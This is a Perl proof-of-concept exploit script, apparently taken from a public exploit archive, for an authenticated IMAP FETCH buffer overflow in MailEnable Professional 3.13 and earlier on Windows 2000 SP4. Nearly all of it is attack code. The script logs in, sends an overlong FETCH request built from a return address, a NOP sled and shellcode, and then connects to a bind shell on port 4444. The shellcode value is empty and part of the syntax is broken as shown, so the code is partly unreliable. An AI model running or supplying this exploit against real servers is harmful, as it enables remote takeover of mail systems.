MailEnable Professional versions 3.13 and below FETCH post-auth buffer overflow exploit for Win2K SP4 Pro English that binds a shell to port 4444.
# =================================================================
# MailEnable Professional <= 3.13 "FETCH" post-auth buffer overflow
# =================================================================
# Bind Shell POC Exploit for Win2K SP4 pro English
# Found by : Luigi Auriemma
# Advisory :
# Exploit by : haluznik | haluznik<at>
# 10.3.2008 ..enjoy!:]
# =================================================================
use IO::Socket;
print "\n [*] MailEnable Professional 3.13 imap remote exploit";
print "\n [*] exploit by haluznik | bug discovered by Luigi Auriemma\n\n";
if (@ARGV < 3)
print " [!] Use: perl [Host] [User] [Pass]\n";
my $host = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
my $port = "143";
# metasploit shellcode port 4444
# bad char: 0x00 0x0A 0x0D 0x20 0x29
my $shellcode=
my $buff = "A" x 997 . "\xbb\xed\x4f\x7c" . "\x90" x 20 . $shellcode;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die " [-] cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print " [i] " . $reply;
print " [+] logging..\n";
$exploit = "a001 LOGIN " . $user ." " . $pass ."\r\n";
send $socket, $exploit, 0;
recv($socket, $reply, 1024, 0);
print " [i] " . $reply;
$exploit = "a002 SELECT INBOX" ."\r\n";
send $socket, $exploit, 0;
print " [+] sending evil payload..\n";
$exploit = "a003 FETCH 1:4 " . $buff ."\r\n";
send $socket, $exploit, 0;
print " [*] exploiting done!\n";
print " [*] connecting to port 4444 of $host\n";
system("telnet $host 4444");
close $socket;